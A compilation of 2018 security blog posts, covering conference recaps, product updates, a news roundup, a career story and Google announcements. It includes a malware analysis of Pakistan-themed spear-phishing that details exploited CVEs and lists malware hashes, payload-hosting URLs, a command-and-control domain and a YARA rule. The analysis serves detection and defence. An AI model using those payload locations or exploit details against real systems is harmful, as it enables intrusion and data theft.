BlackHat is always one of the most interesting conferences of the year. Firmly sandwiched between BsidesLV and DefCon, it brings a unique mix of research and people to Las Vegas. We unveiled our new booth design, which featured a huge Alien head hovering above the shiny new green and black booth, which had a presentation theatre on one side and demo pods on the other.  As always, the booth proved to be a great hit and served as the central point where we could meet old friends and new. The Talks Parisa Tabriz, director of engineering at Google, delivered the keynote address at this year’s BlackHat. Tabriz likened most security to a game of whack-a-mole and encouraged security professionals to embrace three steps of in an interesting address: Tackling root cause Picking milestones (and celebrating achieving them) Building out a coalition (beyond the industry) Our own Aliens had a couple of speaking sessions. Sanjay Ramanath delivered a session entitled the Defender's Dilemma to the Intruder's Dilemma. Over at the Diana Initiative at DefCon, Kate Brew presented, "Age Like a Fine Wine, not a Fine Whine" - I was particularly disappointed to have missed this talk as I had to fly back home and there was a no photos or video policy. The ever-expanding show I missed BlackHat last year, and this year it felt as if I'd almost walked into RSA. The vendor halls seemed a lot bigger and spaced out than before. With over 250 vendors exhibiting, there was a lot of floor space to cover, technologies to see, and swag to be grabbed. However, perhaps one of the most interesting aspects of the show floor is across from the main hall in the BlackHat Arsenal. The Arsenal is an area for independent researchers where open-source tools and products are demonstrated in 20-minute sessions in an informal setting. I recall the first time I saw the Arsenal a few years back, it was in a small corner with a handful of tools - but it has grown into an almost con-within a con. The organisers have definitely done a great job with it, and you should have it on your list of things to see next time you are at a BlackHat. Swapping parties for breakfasts People usually ask what the parties are like - every night in Vegas there appears to be a party or event of some sort. However, if you're like me, then parties may not be your scene. So I spent the week getting early nights and arranging breakfast meetings instead. Personally, this was one of the best decisions I made. It was great to get up well-rested, to sit in a quiet venue and have good discussions over breakfast. While this approach may not be for everyone, my pro tip for Vegas is always to schedule some quiet time away from the noise. Until next time When it was all said and done, it was a very enjoyable, if not tiring week filled with great content, the opportunity to meet up with old colleagues, and make some new connections. We look forward to seeing you at an event soon.       

Whether you sell clothes online or have recently set up a financial services firm, every startup needs to have a strong online presence in order to make the right moves in 2018. To do this, it is critical that you align with a premium-quality hosting provider. After all, if you choose a web host that is unreliable and does not deliver high levels of performance, then the usability and speed of your website will suffer. Not only will this frustrate your customers and prospects, but it will cause your search engine ranking to fall too. This is something that no business can afford, but especially not a startup that’s struggling to get established. So, with that in mind, read on to discover all of the different things you need to look for when choosing a hosting company for your startup. Start by identifying your hosting needs The first thing you need to do is understand your hosting needs. You won’t be able to find the right web host for you if you do not know what you need. To determine this, you need to first ask yourself a number of different questions, including the following: What type of platform are you going to use for your website? For example, will it be WordPress or a different platform? What sort of website are you going to build? Are you going to build a portfolio website, organisational website, blogging website, or something else? Are you interested in building more than one website? What is the sort of volume of traffic that you are aiming for? Are you going to require special software to code your site, for example, .net, java, php, etc.? By answering these important questions, you will be able to figure out what you need so that you have a good starting point in your quest to find the best web host for your particular requirements. Reliability, performance, and server uptime There really is only one place to begin when it comes to assessing the quality of a web host business, and this is by looking at the level of performance and the guaranteed uptime they provide. Don’t settle for anything less than the best in terms of uptime, as your business cannot afford to be offline. Companies like HostGator and SiteGround guarantee 99.9 percent uptime. You should not settle for anything less than 99 percent. Other factors also play a critical role in helping you determine whether a web host is reliable or not. This includes things like bandwidth, daily back-ups, and RAID protected storage. You will also want to ensure that the company provides 24/7 customer support, as you want to have complete peace of mind that any issues will be dealt with immediately so that they do not have a negative impact on your business. In terms of site back-ups specifically, there are a few key questions you can ask a prospective company to get a better understanding of this aspect: Do you only provide the back-up itself or do you offer assistance in restoring the back-up? Do you offer any plug-ins for site back-ups? How often do automatic back-ups take place? Are there any options for manual site back-ups? Is there the option for site back-ups within the admin control panel? This will help you determine how frequently back-ups occur and whether or not there is any level of customisation. This is critical because no business can afford to lose their critical data, so you need to be able to back-up your data according to your requirements. Price and refunds Businesses need to assess every purchase with care. This is especially the case with startups, as the way you spend your money is going to have a massive impact on whether or not your company survives. Most hosting providers charge around the £3-mark per month. You do need to be mindful of companies that charge more for additional services, as well as those that put their prices up considerably when you renew. The refund policy is also important. Is there a trial period during which you can get a refund if you cancel your web host account? Can you upgrade your plan after the trial period? Are there any cancellation charges in place? The level of customer service provided Customer service is another critical factor that needs to be taken into consideration before you sign up with a web host company. Some host providers claim to offer 24/7 customer support, but if that actually consists of typing your message to a live chat bot and getting a generic response, then it’s not going to be of much use, is it? Customer service not only needs to be easily accessible but it needs to be of a high level of quality too, so make sure you are clear on what their customer service policy entails. Upgrade options It is highly likely that your needs and requirements will change as your company grows and progresses in the industry. In the beginning, many startups opt for a shared web hosting plan because this is a good way to keep expenses low. As a rough estimation for WordPress websites that have been optimised correctly, a shared web hosting account can host up to 50,000 unique visitors. When your website starts to exceed these numbers, you will probably need to upgrade your account. It is unlikely you will want to go through the hassle of transferring your website to another host, so it is important to consider upgrade options from the beginning. As you can see, many different factors need to be taken into consideration when choosing a hosting provider. However, if you take note of all of the points that have been mentioned above, you should have no trouble finding the right provider for your needs, budget, and requirements. Don’t underestimate the importance of this decision. After all, your web host is going to have a huge influence on your web performance as well as an impact on your ultimate success, and we all know how important having an effective online presence is in the current day and age.       

We have an audacious goal on the USM Central Product team. We believe that we can create the most phenomenal security platform for MSPs and MSSPs on the market with the combination of USM Central, USM Anywhere, and USM Appliance. As we move into Q3, we wanted to take some time to stop and reflect a bit on our journey. We thought it’d be helpful to provide some perspective on the problems we believe USM Central should solve for our customers, recap what we’ve built so far, and preview what’s ahead of us as we storm ahead into the back-half of the year. When prioritizing our efforts for USM Central, we always try to ask ourselves two questions. The first is, “how can we help our MSSP / MSP partners to be more efficient?” For instance, are they taking some redundant action multiple times across several deployments? What data are they looking for in the “child deployments” that would be helpful to view in USM Central? The second is, “how are USM Central users “patching” our functionality?” By talking to our partners every week, we try to understand what other systems or tools they are using in conjunction with our products and find ways that we could either 1) address that need in product or 2) integrate with the existing workflow. While USM Anywhere continues to push the envelope on core security capabilities, we believe we can create “SOCs with superpowers” with USM Central by showing up every day and trying to answer those two questions. Below, you’ll find a short summarization of our recent efforts and what we’re excited about moving forward. Alarm Status and Label Synchronization Labels are a simple yet powerful method to track the status of alarms in the various stages of the investigation cycle, classify alarm data for analysis/reporting, or even show “proof of work” to your end customers. Before USM Central, any edit to a label in the child instance would not be reflected in the Federation Server, requiring an analyst to make the label or alarm updates in multiple places. Today, any changes made to an alarm from connected USM Anywhere deployments are automatically synced to USM Central, and USM Central users can standardize labels across all of their USM Anywhere deployments. We're hoping this will dramatically streamline alarm workflows. Check out the details of this feature in the documentation here. Orchestration Rule Management Often, when our MSSP partners create an orchestration rule in USM Anywhere for one client, they recognize that it would be useful to deploy that same rule to another client. Additionally, when onboarding a new client, we’ve found that it’s helpful to do a comparative audit with another more mature deployment to make sure all of you've covered all of your bases, from filtering to alarm rules. With the most recent release of USM Central, all of the rules for your connected USM Anywhere deployments are now synced to USM Central. USM Central users can filter their view to only view rules from selected deployments or to copy a rule and quickly apply it to another customer. API Availability Do you use a ticketing system to generate tickets for alarms generated within your AlienVault deployment(s)? Maybe you customize reports or dashboards by using data from AlienVault and other products for use internally or client presentations? You can now generate an API key in product for the USM Central API. The REST interface will allow you to search for alarms for all of you connected USM Anywhere or USM Appliance instances. For this first release, we've only exposed an Alarms endpoint, but we're looking forward to adding additional capabilities in the coming months. Check out our documentation here or head to the Profile view within your USM Central instance to test it out today! What’s Next? In an upcoming release, you’ll have the ability to manage labels for connected USM Appliance deployments, too. Next, we’re going to look at adding additional API endpoints for vulnerabilities and configuration issues (only applicable for USM Anywhere to start). After that, we’ll circle back and expand on our role-based access control feature set. As a manager, you’ll have the ability to assign your analysts to specific deployments in your USM Central installation. For example, Analyst A could be assigned to deployments 1 - 3 while Analyst B is assigned to Deployments 4 - 6. Each analyst’s view and permissions would be limited to their assigned deployments. We’re hoping this makes it easier to manage USM Central deployments with a large number of child deployments. Late this year, we’ll begin to bridge the gap towards allowing you to initiate incident investigation and response workflows directly from USM Central. We’ll start with managing vulnerability scans and go deeper from there based on your feedback. Thanks for tuning in. You can give me a shout anytime you want by hitting the “mail” icon and messaging me within your USM Central instance. We’d love to hear any feedback or learn about your business! Cheers, Skylar Talley Senior Product Manager, USM Central & USM Appliance       

The AlienVault team is ready to meet and greet visitors at Black Hat USA 2018, August 8th and 9th at the Mandalay Bay Convention Center in Las Vegas! Black Hat is one of the leading security industry events. The conference features the largest and most comprehensive trainings, educational sessions, networking opportunities and a two-day expo packed with exhibitors showcasing the latest in information security solutions from around the world! Visit us at Booth #528! Visit booth #528 located below the large, green alien head! We will be leading theater presentations twice an hour. Attendees will get a cool AlienVault collectors t-shirt, as well as a chance to win a pair of Apple® AirPods during our daily raffle. Stop by and meet the AlienVault team and learn about the recently announced endpoint detection and response capabilities now part of the USM Anywhere platform! USM Anywhere is the ONLY security solution that automates threat hunting everywhere modern threats appear: endpoints, cloud, and on-premises environments – all from one unified platform. Check out this awesome video by Javvad Malik, Community Evangelist for AlienVault, to learn more here! Attend "From the Defender's Dilemma to the Intruder's Dilemma" Session for a chance to win a Nintendo Switch! Join AlienVault VP of Product Marketing Sanjay Ramnath at a Black Hat speaking session. Sanjay will be speaking on Wednesday, August 8th from 10:20am-11:10am in Oceanside E on 'From the Defender's Dilemma to the Intruder's Dilemma'. We will be handing out raffle tickets before the session begins. Be sure to check out this session for the chance to win a Nintendo Switch! Get Access to the Exclusive Security Leaders Party at Black Hat! AlienVault is co-sponsoring one of the hottest security parties at Black Hat! Join us on Wednesday night from 8:00 - 10:00pm - guests will enjoy music, food, and a full open bar at the best venue at Mandalay Bay, Eyecandy Sound Lounge! This will be the most talked about party of BHUSA 2018! We expect to reach capacity, so don't hesitate to get on the list now! Event Details: Date: Wednesday, August 8th Time: 8:00 - 10:00 PM Location: Eyecandy Sound Lounge, Mandalay Bay We can’t wait to see you all at #BHUSA this week!       

It’s August already. The kids are off on their summer vacations telling me how bored they are every 5 minutes, and the annual security gathering in Las Vegas of Blackhat, Defcon, and BsidesLV is all but upon us. There will be no recap next week because I’ll probably be getting ready to fly home - but normal service should resume the following week. The Red Pill of Resilience in InfoSec Another insightful write up by Kelly Shortridge, which happens to be the full text of her keynote on resilience. It touches on, and expands many concepts to uncover what it really means to be resilient in infosec, and what the industry can do. The Red Pill of Resilience in InfoSec | Medium, Kelly Shortridge VDBIR Data The Verizon Data Breach Report has become the staple go-to report for security professionals wanting to understand the breach landscape. But a once-a-year report is usually too long for most of us to wait to see what’s new. So the good folk have created an interactive portal where you can explore the most common DBIR patterns. VDBIR Portal | Verizon enterprise Reddit Breached Reddit disclosed a breach and say they’re still investigating. It appears that the attacker was able to bypass SMS-based two-factor (two-step) authentication. We had a security incident. Here’s what you need to know | Reddit It’s worth revisiting this blog by Paul Moore on the difference between two-factor and two-step authentication. The difference between two-factor and two-step authentication | Paul Moore Alex Stamos off to Academia Facebook chief security officer Alex Stamos is leaving the social network to work on information warfare at Stanford University. The social network has not named any replacement. Facebook's security boss is offski. Not to worry, it has 'embedded security' in all divisions | The Register CISCO + DUO = DISCO! Cisco has announced it will be acquiring DUO Security for $2.35bn in cash it found lying behind the sofa. Cisco is buying Duo Security for $2.35B in cash | Tech Crunch Farcial Recognition Amazon’s face surveillance technology is the target of growing opposition nationwide, and today, there are 28 more causes for concern. In a test the ACLU recently conducted of the facial recognition tool, called “Rekognition,” the software incorrectly matched 28 members of Congress, identifying them as other people who have been arrested for a crime. Amazon’s Face Recognition Falsely Matched 28 Members of Congress With Mugshots | ACLU Secure Design Part 3 of an ongoing series of articles by Tanya Janca on secure system development lifecycle. Worth reading all parts with fun titbits such as, Threat modelling (affectionately known as ‘evil brainstorming’) Pushing Left, Like a Boss: Part 3— Secure Design | Medium, Tanya Janca Randomness Other stories from broader tech and beyond that I enjoyed reading this week When a stranger decides to destroy your life | Gizmondo Meet the Anarchists Making Their Own Medicine | Motherboard How an Ex-Cop Rigged McDonald’s Monopoly Game and Stole Millions | The daily beast       

As students, we get told that college is enough to land us anything we want, I can honestly say from my experience, that was not the case at all. I grew up in a household where education will land you where you want, and you don’t need to be external with the system, so I assumed as long as I have a good GPA to show, any company would want me. You don’t have to do exactly what I did. Honestly, I advise you not to, and you’ll see why. Instead, use this as awareness that you shouldn’t just allow your classes to speak for you and you should get ahead while you have time. I’m going to explain a little about my background in education and then dive into what I did during my 3rd year of university to make me go from being declined from every position I apply for, to having a table full of internship offers that were from many different sides of business, including the medical field. My Educational Background I started university at a school that focused on the offensive side of security, I finished 2 years then decided to travel to a different city to attend a new university that titles me as a cybersecurity engineer, so I started to focus on the defensive side of security. Note that this university has a cybersecurity program that is very well known in the state, that’s why I transferred. So 3rd year hit, I figured it was getting close to start applying for internships for the upcoming summer. I felt like I needed to finally enter this field, 3 years of being JUST a student is enough. I want to finally have a title I loved in the real world. How it started It got close to winter break, so I decided to start applying for 2018 summer internships. I felt pretty confident, 3.98 GPA, engineering school, strong courses, and a good university. Unfortunately, this is where it started, decline after decline, not even getting past the first stage prior to interviewing. It felt like not a single company wanted me and I was becoming more and more destroyed after each "We regret to inform you" letter. I felt like the past 3 years have been a waste. Okay, decline after decline, it’s clearly my fault, I’m doing something wrong, but what? My GPA is really good, I don’t understand why I’m not even getting past the first stage, I felt weak and unimpressive. I opened up my resume and really started looking at it. I tried looking at it from a professional perspective, if I was hiring this student, what am I looking for? Then I noticed it, I’m just a student, I noticed all I have to show was a number (my GPA), and courses I’m required to take for my field, that’s it. I had no other way to show who I AM, other than my resume representing that I am a college student. There was no information about ME, WHAT I LIKE, WHAT I DO, NOTHING. The 4-month long journey That’s when I really freaked out, I want so much in life yet all I’ve been is a student that doesn’t work on my career outside of school. Book after book, I’ve been a student, I never really introduced myself to this field, to my future, and to who I want to be. All I’ve been doing is listening to my professors teach me, rather than also teach myself. So, I did the only thing I felt like I needed to do, time to play catch up and get ahead. During school, for 4 months, I began doing side project after side project. This was fun yet destroying my mental and physical health, I slept on average 2-4 hours a night (7 nights a week) on my couch right next to my computer just to get up and continue. I didn’t eat much, didn’t see my family much, barely socialized, and didn’t care to go to some of my classes. A few projects I’ll say I was doing were created/solved cryptography puzzles, built a self-driving car, researched/experimented hacking air-gapped computers, participated in National Cyber League to gain some sort of external experience, wrote security articles, read a lot, introduced myself to security frameworks, and so on. This was around the time where CryptoCypher introduced me to the existence of the infosec community, and I started to meet great people that gave me an understanding of many different aspects of this field. Being ready Okay, nearly 4 months later, I’ve strengthened my resume (had about 8 professionals look at it), I’ve introduced myself more to this field, but now I feel like I need to understand what my responsibilities are in a company before I go into interviews. Where do I see myself in 5 years? Why do I want to work here? Many simple questions like that would originally get me speechless. I asked a few friends in class what they would answer, they said typical stuff a student would say, “in 5 years I see myself as a (insert title)”, “I want to work here because as a student being introduced to this type of environment would help my future.” I saw right through this, my entire objective is to bypass looking like an average student, I want companies to look at me differently. So that's when I started to create small 5-year plans for my future. So, when asked, instead of saying where exactly I want to be in 5 years, I can elaborate on what I want to know in a 5-year window, and the process I'm wanting to take to build my knowledge while getting there, and how the company I’m applying for would strengthen that. The next thing is understanding security from a real-world perspective, so that's when I started to read articles, understanding different titles in security, cyber threat intelligence versus business risk intelligence, and things like that. When I get asked why I want to work here, I can respond with how based off the responsibilities the title represents, I would tailor projects surrounding them to strengthen the company with the team based off real activities with IT as a whole. BEING ACCEPTED Well, summer is right around the corner, so it was time to finally start applying, I am ready. Yes, I am still getting decline emails from companies I applied to months ago, but that's okay, I'm in a better position. I started applying, and that's when I realized the past 4 months have been a success. Company after company wanting to interview me from many different areas of business. I started going to interviews, all of them I was super nervous towards but the second I walked in the door I felt really confident all of a sudden, and that's what made me nail so many of them. Confidence. I don't want to go too deep into how to nail interviews, but please make sure you know yourself, the company, and the position, correlate all 3 of those into the interview. Questions like biggest weakness, strengths, tell me about yourself, all the "basic" questions can really mess up a position, I used YouTube tutorials for hours to learn how to answer each one confidently. Also, when you get asked if you have any questions at the end of the interview session, ASK. It will feel empty if you say, "No Thank you" and walk out. Ask questions like "Working for this company as a (insert your title), what does the day to day look like?" and "As a (insert title) intern, what do you expect from me 30 days into this internship?" and so on, just get an idea of what the company is and show your interest in the position you are being interviewed for. Conclusion So that's my story, I hope this helps some of you to realize that companies do care about your side projects, and a GPA isn't the only thing that's important. Be productive outside of classes, read articles then turn the concept into projects, join the infosec community and make friends, ask professionals for help on your resume, know what you want and walk into that interview confident. As far as where I am now, I am getting ready to start my 4th year, working as a cybersecurity engineer intern at a multi-billion dollar headquarter, and finally being introduced to this field outside of being a student, and the only thing I can say to that is I am in love with all of this. Also, I will be attending Black Hat USA 2018 and DEF CON this year, so if you’re there, feel free to make plans with me for a meet-up. Anyway, work for the position you want, I promise you're going to thank yourself for doing that.       

Introduction We’ve identified a number of spear phishing campaigns with Pakistani themed documents, likely targeting the region. These spear phishing emails use a mix of different openly available malware and document exploits for delivery. These are served from the compromised domains www.serrurier-secours[.]be and careers.fwo.com[.]pk (a part of the Pakistani army). There are some clear trends in the themes of the decoy documents the attackers chose to include with file names such as: China-Pakistan-Internet-Security-LAW_2017.doc Strategic Thinking on Ensuring Ideological.docx Fazaia_Housing_Scheme_Notice_Inviting_Tenders.doc PAFs first multinational air exercise ACES Meet 2017 concludes in Pakistan.doc IDUF-01.doc Pakistan Air Force Jet Crashes During Routine Operation  Sales_Tax.doc Hajj Policy and Plan 2017.doc Summary The first document we (and others) analysed contains a list with names of officers who are being promoted in the Pakistan Atomic Energy Commission: This is probably a targeted attack, with a very few number of spam emails delivered to a selected bunch of people. Although the document is dated on December 2017, we’ve seen related malware dating back to June 2017. A number of these documents have been previously identified by users on Twitter. We were surprised to find these documents drop a mix of low quality rats such as Pony and Netwire - normally more associated with ameteur attacks against banking credentials than something more targeted. As we’ve seen previously, the usage of openly available malware makes attribution difficult. Analysis When opened, the document drops several files. Among them, an encapsulated PostScript, identified by 6f3beaca4f864a15ac5eb70391a5e9e3. The corrupted EPS tries to exploit CVE-2015-2545, which allows an attacker to execute arbitrary code allocated inside an EPS header. In this case, the code they are trying to execute is the payload identified as c97a22cbc20c1f2237e649abee8c92fb. This is a DLL file containing a malicious remote access tool. Its capabilities include sandbox evasion, local privilege escalation and remote code execution in the infected machine. The packet also loads multiple system functions, commonly found in Windows malware families, allowing: Processes and files creation/destruction. Extract system information. Take system snapshots. Networking capabilities. Privileges escalation. The payload check for the system version, to find out if it is vulnerable to either remote code execution or local privilege escalation. The process flow found in the scene seems to exploit CVE-2016-7255. This exploits, which allows privilege escalation on a Windows machine, is triggered by a win32k.sys call to NtSetWindowLongPtr, for the index GWLP_ID on a window handler with WS_CHILD value on GWL_STYLE attribute. This vulnerability became very popular on November 2016, after hacker group APT28 used it to perform targeted attacks. The flow of the main escalation privileges thread is described in the picture. The program uses a call to cmd.exe /k whoami, to verify whether the RCE has worked. The final payload dropped is a sample containing the infamous Netwire RAT. We found similar purpose packages dropped by some of the other documents mentioned. The attack pattern and some other indicators, like domain names, look similar to the Revenge RAT campaign analyzed by RSA Link security researchers. Detection We detect the malware used in these attacks in a number of ways across the host and the network. Agent Detections The AlienVault Agent is a lightweight, adaptable endpoint agent based on osquery and maintained by AlienVault. In USM Anywhere, the AlienVault Agent enables continuous endpoint monitoring, using the built-in AlienVault threat intelligence to automate endpoint queries and threat detection alongside your other network and cloud security events. This allows USM Anywhere to deliver endpoint detection and response (EDR), file integrity monitoring (FIM), and rich endpoint telemetry capabilities that are essential for complete and effective threat detection, response, and compliance. The AlienVault Agent detects the following malicious activity during the attacks: Suspicious Process Created by Microsoft Office Application Core Windows Executable launched from Wrong Path Network Detection Rules ETPRO TROJAN NetWireRAT Keep-Alive ETPRO TROJAN NetWire Variant ETPRO TROJAN Netwire RAT Check-in ETPRO TROJAN Fareit/Pony Downloader CnC response ETPRO TROJAN Fareit/Pony Variant CnC Beacon ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin ET POLICY PE EXE or DLL Windows file download HTTP ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) USM Anywhere Correlation Rules Detect this malware activity with the following correlation rules: System Compromise - Malware Infection - Remote Access Trojan System Compromise - Malware Infection - Downloader System Compromise - Malware Infection - Dropper System Compromise - Malware Infection - Trojan Thanks to Chris Doman and Javvad Malik for collaboration. Appendix Related analysis by users on Twitter https://twitter.com/securitydoggo/status/926144466674647041 https://twitter.com/avman1995/status/905694140788219904 https://twitter.com/ImPureMotion/status/906216798986670080 File-Hashes 027E4C6C51E315F0E49F3644AF08479303A747ED55ECBA5AA0AE75C27CD6EFEB 81E518E094D597965F578F6F42C22C363450E8FB8D33C0A9568254CA048C15E6 096012A5A9CF483FE0BDCD5A1030CC4D85B8E5296609FDC3632F2337A897A394 291CA9E4AA9DB88635A89CB58F8DBF49E60ABDDBBCEC1C4A611EF4192BFC6D24 2BE03E829856AD2FF772BA1F5074D4EAFBF3ECAB8D97794D1CC6589E043E3A28 2E219FC95D7B44D8B0E748628E559A9EC79A068B90FE162B192DAA8CF8D6F3EE 40E9287FF8828FB0E6BAEDCFF873E8E35520C6227200F1C84B63446F07A59289 48463E268ACB50FFBCB27EAFF46F757486A985FFC2D10F35AE1B9422660A20D2 4BA13ADD1AA8AE3FFFCB83F9B0990A6CD8B8912FC0E26811D0211F72AAAA7C79 82CE7DFFEF284571CA21EB240869148B7F3583D9CB95EBDC42C77536DCCC9060 855AD4DCB9C5502D6EF73528704046CACF006770FD4AF23259CB33E7577CD205 F110283C4E459CC20E908267D88EDBA26E2135BCB7D7335CABBED1A128EDEB86 A70CACC8BFFFC4A67171122FC424ED95FC3F89BC592D7489AACC666E5834F571 A8FA4C806D97E59DB0C42B574558A68942EADFE56286A66D90A8F6248A34CF43 URLs http://careers.fwo.com[.]pk/css/microsoftdm.exe http://careers.fwo.com[.]pk/css/printer.exe http://sandipuniversity.edu[.]in/list/87_Copy.docx http://www.serrurier-secours[.]be/.../China-Pakistan-Internet-Security-LAW_2017.doc http://www.serrurier-secours[.]be/.../PAF%e2%80%99s%20first%20multinational%20air%20exercise%20ACES%20Meet%202017%20concludes%20in%20Pakistan.doc https://www.serrurier-secours[.]be/.../Fazaia_Housing_Scheme_Notice_Inviting_Tenders.doc https://www.serrurier-secours[.]be/.../Hajj%20Policy%20and%20Plan%202017.doc https://www.serrurier-secours[.]be/.../Pakistan%20Air%20Force%20Jet%20Crashes%20During%20Routine%20Operation.doc https://www.serrurier-secours[.]be/.../Sales%20-%20Tax%20&amp Domains 0x0.ignorelist[.]com Yara Rule rule Pakistan_atomic_comission_dropped_dll    {    meta:    description = "Pakistani Atomic Energy Commission Spearphishing dropped DLL"    author = "Jose M Martin"    date = "2018/07/10"    hash = "027e4c6c51e315f0e49f3644af08479303a747ed55ecba5aa0ae75c27cd6efeb"    strings:    $s1 = "ExploitTagMenuState start" fullword ascii    $s2 = "ExploitTagMenuState end" fullword ascii    $s3 = "DonorThread start" fullword ascii    $s4 = "EscalateThread start" fullword ascii    $s5 = "EscalatePrivilegesOld start" fullword ascii    $s6 = "EscalatePrivilegesWow" fullword ascii    condition: uint16(0) == 0x5A4D and filesize < 30KB and (any of them) }       

Posted by Eric Brown and Marc Henson, Trust & SafetySince 2010, Google’s Vulnerability Reward Programs have awarded more than $12 million dollars to researchers and created a thriving Google-focused security community. For the past two years, some of these rewards were for bug reports that were not strictly security vulnerabilities, but techniques that allow third parties to successfully bypass our abuse, fraud, and spam systems.Today, we are expanding our Vulnerability Reward Program to formally invite researchers to submit these reports.This expansion is intended to reward research that helps us mitigate potential abuse methods. A few examples of potentially valid reports for this program could include bypassing our account recovery systems at scale, identifying services vulnerable to brute force attacks, circumventing restrictions on content use and sharing, or purchasing items from Google without paying. Valid reports tend to result in changes to the product’s code, as opposed to removal of individual pieces of content.This program does not cover individual instances of abuse, such as the posting of content that violates our guidelines or policies, sending spam emails, or providing links to malware. These should continue to be reported through existing product-specific channels, such as for Google+, YouTube, Gmail, and Blogger.Reports submitted to our Vulnerability Reward Program that outline abuse methods are reviewed by experts on our Trust & Safety team, which specializes in the prevention and mitigation of abuse, fraud, and spam activity on our products.We greatly value our relationship with the research community, and we’re excited to expand on it to help make the internet a safer place for everyone. To learn more, see our updated rules.Happy hunting!

Posted by Alexander Dupuy, Software EngineerOnce upon a time, we launched Google Public DNS, which you might know by its iconic IP address, 8.8.8.8. (Sunday, August 12th, 2018, at 00:30 UTC marks eight years, eight months, eight days and eight hours since the announcement.) Though not as well-known as Google Search or Gmail, the four eights have had quite a journey—and some pretty amazing growth! Whether it’s travelers in India’s train stations or researchers on the remote Antarctic island Bouvetøya, hundreds of millions of people the world over rely on our free DNS service to turn domain names like wikipedia.org into IP addresses like 208.80.154.224.Google Public DNS query growth and major feature launchesToday, it’s estimated that about 10% of internet users rely on 8.8.8.8, and it serves well over a trillion queries per day. But while we’re really proud of that growth, what really matters is whether it’s a valuable service for our users. Namely, has Google Public DNS made the internet faster for users? Does it safeguard their privacy? And does it help them get to internet sites more reliably and securely?In other words, has 8.8.8.8 made DNS and the internet better as a whole? Here at Google, we think it has. On this numerological anniversary, let’s take a look at how Google Public DNS has realized those goals and what lies ahead.Making the internet fasterFrom the start, a key goal of Google Public DNS was to make the internet faster. When we began the project in 2007, Google had already made it faster to search the web, but it could take a while to get to your destination. Back then, most DNS lookups used your ISP’s resolvers, and with small caches, they often had to make multiple DNS queries before they could return an address.Google Public DNS resolvers’ DNS caches hold tens of billions of entries worldwide. And because hundreds of millions of clients use them every day, they usually return the address for your domain queries without extra lookups, connecting you to the internet that much faster.DNS resolution process for example.orgSpeeding up DNS responses is just one part of making the web faster—getting web content from servers closer to you can have an even bigger impact. Content Delivery Networks (CDNs) distribute large, delay-sensitive content like streaming videos to users around the world. CDNs use DNS to direct users to the nearest servers, and rely on GeoIP maps to determine the best location.Everything’s good if your DNS query comes from an ISP resolver that is close to you, but what happens if the resolver is far away, as it is for researchers on Bouvetøya? In that case, the CDN directs you to a server near the DNS resolver—but not the one closest to you. In 2010, along with other DNS and CDN services, we proposed a solution that lets DNS resolvers send part of your IP address in their DNS queries, so CDN name servers can get your best possible GeoIP location (short of sending your entire IP address). By sending only the first three parts of users’ IP addresses (e.g. 192.0.2.x) in the EDNS Client Subnet (ECS) extension, CDNs can return the closest content while maintaining user privacy.We continue to enhance ECS, (now published as RFC 7871), for example, by adding automatic detection of name server ECS support. And today, we’re happy to report, support for ECS is widespread among CDNs.Safeguarding user privacyFrom day one of our service, we’ve always been serious about user privacy. Like all Google services, we honor the general Google Privacy Policy, and are guided by Google’s Privacy Principles. In addition, Google Public DNS published a privacy practice statement about the information we collect and how it is used—and how it’s not used. These protect the privacy of your DNS queries once they arrive at Google, but they can still be seen (and potentially modified) en route to 8.8.8.8.To address this weakness, we launched a public beta of DNS-over-HTTPS on April 1, 2016, embedding your DNS queries in the secure and private HTTPS protocol. Despite the launch date, this was not an April Fool’s joke, and in the following two years, it has grown dramatically, with millions of users and support by another major public DNS service. Today, we are working in the IETF and with other DNS operators and clients on the Internet Draft for DNS Queries over HTTPS specification, which we also support.Securing the Domain Name SystemWe’ve always been very concerned with the integrity and security of the responses that Google Public DNS provides. From the start, we rejected the practice of hijacking nonexistent domain (NXDOMAIN) responses, working to provide users with accurate and honest DNS responses, even when attackers tried to corrupt them.In 2008, Dan Kaminsky publicized a major security weakness in the DNS protocol that left most DNS resolvers vulnerable to spoofing that poisoned their DNS caches. When we launched 8.8.8.8 the following year, we not only used industry best practices to mitigate this vulnerability, but also developed an extensive set of additional protections.While those protected our DNS service from most attackers, they can’t help in cases where an attacker can see our queries. Starting in 2010, the internet started to use DNSSEC security in earnest, making it possible to protect cryptographically signed domains against such man-in-the-middle and man-on-the-side attacks. In 2013, Google Public DNS became the first major public DNS resolver to implement DNSSEC validation for all its DNS queries, doubling the percentage of end users protected by DNSSEC from 3.3% to 8.1%.In addition to protecting the integrity of DNS responses, Google Public DNS also works to block DNS denial of service attacks by rate limiting both our queries to name servers and reflection or amplification attacks that try to flood victims’ network connections.Internet access for allA big part of Google Public DNS’s tremendous growth comes from free public internet services. We make the internet faster for hundreds of these services, from free WiFi in San Francisco’s parks to LinkNYC internet kiosk hotspots and the Railtel partnership in India‘s train stations. In places like Africa and Southeast Asia, many ISPs also use 8.8.8.8 to resolve their users’ DNS queries. Providing free DNS resolution to anyone in the world, even to other companies, supports internet access worldwide as a part of Google’s Next Billion Users initiative.APNIC Labs map of worldwide usage (Interactive Map)Looking aheadToday, Google Public DNS is the largest public DNS resolver. There are now about a dozen such services providing value-added features like content and malware filtering, and recent entrants Quad9 and Cloudflare also provide privacy for DNS queries over TLS or HTTPS.But recent incidents that used BGP hijacking to attack DNS are concerning. Increasing the adoption and use of DNSSEC is an effective way to protect against such attacks and as the largest DNSSEC validating resolver, we hope we can influence things in that direction. We are also exploring how to improve the security of the path from resolvers to authoritative name servers—issues not currently addressed by other DNS standards.In short, we continue to improve Google Public DNS both behind the scenes and in ways visible to users, adding features that users want from their DNS service. Stay tuned for some exciting Google Public DNS announcements in the near future!

